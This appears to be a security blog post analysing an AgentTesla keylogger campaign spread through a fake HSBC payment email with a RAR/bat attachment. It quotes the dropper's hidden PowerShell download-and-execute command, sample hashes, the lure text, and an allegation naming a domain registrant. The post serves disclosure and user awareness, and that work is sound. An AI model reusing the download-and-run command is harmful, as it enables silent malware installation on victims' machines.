AgentTesla Keylogger Campaigns Continue

Office Macro Malware

WE still see loads of AgentTesla keylogger/ Info-stealer malware campaigns hitting the UK most days. I don’t often post them here, unless there is something slightly different or unusual about either the delivery method or the malware itself changes. I just submit to Antivirus companies & most times tweet the details to other security researchers.

Today’s version is very slightly different and pretends to be a Bank Transfer Payment Notification allegedly coming from The Hongkong and Shanghai Banking Limited.

The email is the usual junk email that should be blocked by most spam filters. The attachment is a .rar file but has been programmed ( probably in error) to be a part of a multi file archive. These only open in winrar not in most versions of winzip or windows inbuilt archive extraction tools. It isn’t overly common for AgentTesla to use bat files as part of the delivery system.

This bat file simply contains a windows powershell script telling it to download the AgentTesla binary from a remote site, move it to %temp% and run it.

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(‘’,’%TEMP%\Test.exe’);Start-Process ‘%TEMP%\Test.exe’

The website appears to be a file hosting / public web based back up service. Connections to it from UK are extremely slow. We have seen quite a few different malware versions distributed via this network over recent months

Transfer Copy swift.r00 : Extracts to: Transfer Copy swift.Bat Current Virus total detections: anyrun|

Downloads the AgentTesla binary from VirusTotal [web] [file] This malware binary has been known about on VirusTotal for about 1 month now.

This exfils via SMTP using using & sending to I have seen numerous email addresses on being used for these AgentTesla keylogger / info-stealer campaigns all sending to who appears to be the listed registrant for the domain and has a Nigerian address and phone number. The user name Mrfred434 has 8 other domains listed under that name & the email address has 15 domains listed:

I have not checked how many are still live & active: Most are registered via PDR 2018-10-23 2018-10-18 2018-12-28 2018-12-12 2019-02-01 2018-11-05 2018-10-03 2018-09-15 2018-09-10 2019-03-07 2018-08-13 2019-07-21 2019-07-21 2018-09-13 2019-07-18

Then we dig a bit more & find a name Frederick Agwu associated with the email address who has a further 40 domains listed 2018-09-13 2015-12-04 2015-11-26 2017-08-07 2017-07-26 2017-06-05 2017-03-02 2017-02-23 2017-01-16 2017-01-16 2016-11-25 2016-09-17 2016-09-05 2016-09-02 2016-09-02 2016-08-31 2016-08-29 2016-08-02
techno– 2016-07-10 2016-06-10 2016-05-28 2016-04-05 2016-01-27 2016-01-12 2017-08-07 2017-03-15 2017-01-16 2016-12-09 2016-02-05 2016-08-29 2016-06-21 2016-04-04 2016-01-07 2016-01-07 2017-08-10 2016-12-13 2016-05-15 2017-08-16 2017-03-19 2017-08-09 2017-08-17 2016-12-12 2016-01-11 2016-04-04 ilovecom 2016-06-24 2017-08-04

Even more digging finds yet another email address with 51 listed domains 2016-01-07 2016-01-12 2016-01-27 2016-04-04 2016-04-05 2016-05-15 2016-05-28 2016-06-10 2016-06-21
techno– 2016-07-10 2016-08-02 2016-08-29 2016-08-29 2016-08-31 2016-09-02 2016-09-02 2016-09-05 2016-09-17 2016-02-05 2016-11-25 2016-12-09 2016-12-13 2017-01-16 2017-01-16 2017-01-16 2017-02-23 2017-03-02 2017-03-15 2017-03-19 2017-06-05 2015-10-07 2015-10-07 2015-10-04 2015-09-13 2015-09-10 2015-09-08 2015-08-29 2015-08-28 2015-08-24 2015-07-13 2015-08-26 2015-08-26 2017-07-26 2017-08-07 2017-08-09 2017-08-10 2017-08-16

I am sure if I kept digging or someone with more time can find hundreds more domains associated with these Nigerian criminals and hopefully law enforcent can take some action.

You can now submit suspicious sites, emails and files via our Submissions system

Neither The Hongkong and Shanghai Banking Limited nor has been hacked or had their email or other servers compromised. They are not sending the emails to you. They are just innocent victims in exactly the same way as every recipient of these emails. These are coming from a Vietnam IP address that is very well known for all sorts of malicious activity.

This malware file downloads from

One of the emails looks like:

From: The Hongkong and Shanghai Banking Limited <>

Date: Wed 11/09/2019 02:41

Subject: Bank Transfer Payment Notification

Attachment: Transfer Copy swift.r00

Body Content:

Our Ref: HSBCT8723.

Find enclosed Hire payment proof made to your company account on behalf of our client to your receiving bank dated 10/09/2019.

Kindly confirm payment and client Ref details from attached swift Copy and advice accordingly.

Thanks and regards,
David Wong
Funds Transfer Dept.,
Business Banking, Eastern District, Commercial Banking
The Hongkong and Shanghai Banking Corporation Limited (HSBC)
14/F, Causeway Bay Plaza Two, 463-483 Lockhart Road,
Causeway Bay, Hong Kong.


These malicious attachments normally have a password stealing component, with the aim of stealing your bank, PayPal or other financial details along with your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your Facebook and other social network log in details. A very high proportion are Ransomware versions that encrypt your files and demand money ( about £350/$400) to recover the files.

All the alleged senders, amounts, reference numbers, Bank codes, companies, names of employees, employee positions, email addresses and phone numbers mentioned in the emails are all random. Some of these companies will exist and some won’t. Don’t try to respond by phone or email, all you will do is end up with an innocent person or company who have had their details spoofed and picked at random from a long list that the bad guys have previously found. The bad guys choose companies, Government departments and organisations with subjects that are designed to entice you or alarm you into blindly opening the attachment or clicking the link in the email to see what is happening.

Please read our How to protect yourselves page for simple, sensible advice on how to avoid being infected by this sort of socially engineered malware.

This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC / PDF / JPG or other common file instead of the .EXE / .JS file it really is, so making it much more likely for you to accidentally open it and be infected.

Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day.

The basic rule is NEVER open any attachment to an email, unless you are expecting it. Now that is very easy to say but quite hard to put into practice, because we all get emails with files attached to them. Our friends and family love to send us pictures of them doing silly things, or even cute pictures of the children or pets.

Never just blindly click on the file in your email program. Always save the file to your downloads folder, so you can check it first. Many malicious files that are attached to emails will have a faked extension. That is the 3 letters at the end of the file name. Unfortunately windows by default hides the file extensions so you need to Set your folder options to “show known file types. Then when you unzip the zip file that is supposed to contain the pictures of “Sally’s dog catching a ball” or a report in word document format that work has supposedly sent you to finish working on at the weekend, or an invoice or order confirmation from some company, you can easily see if it is a picture or document & not a malicious program.

If you see JS or .EXE or .COM or .PIF or .SCR or .HTA .vbs, .wsf , .jse .jar at the end of the file name DO NOT click on it or try to open it, it will infect you.

While the malicious program is inside the zip file, it cannot harm you or automatically run. When it is just sitting unzipped in your downloads folder it won’t infect you, provided you don’t click it to run it. Just delete the zip and any extracted file and everything will be OK.

You can always run a scan with your antivirus to be sure. There are some zip files that can be configured by the bad guys to automatically run the malware file when you double click the zip to extract the file. If you right click any suspicious zip file received, and select extract here or extract to folder ( after saving the zip to a folder on the computer) that risk is virtually eliminated.

Never attempt to open a zip directly from your email, that is a guaranteed way to get infected. The best way is to just delete the unexpected zip and not risk any infection.


Main object- “Transfer Copy swift.r00”
sha256 c173764e5b509cf3d53503cd58dd35aee0d74a82da1de4c1252667a263638265
sha1 44d8a0fdbf99ce48f0c7b8a6cb4b0c0187557d98
md5 ad695f5ee0d5767da3305522d819b4f1
Dropped executable file
sha256 C:\Users\admin\AppData\Local\Temp\Test.exe 33d2ee7d7ef16344682b121cee3fb189dbdcc070ab7552b150360e418d700a4c
MD5 131c2c561ed08be561321f706140bd43
SHA-1 21d665dd0c37648ab018fff4b06889e14cbe7e16
DNS requests
HTTP/HTTPS requests

Frederick Agwu

Leave a Reply

Your email address will not be published.

Related Posts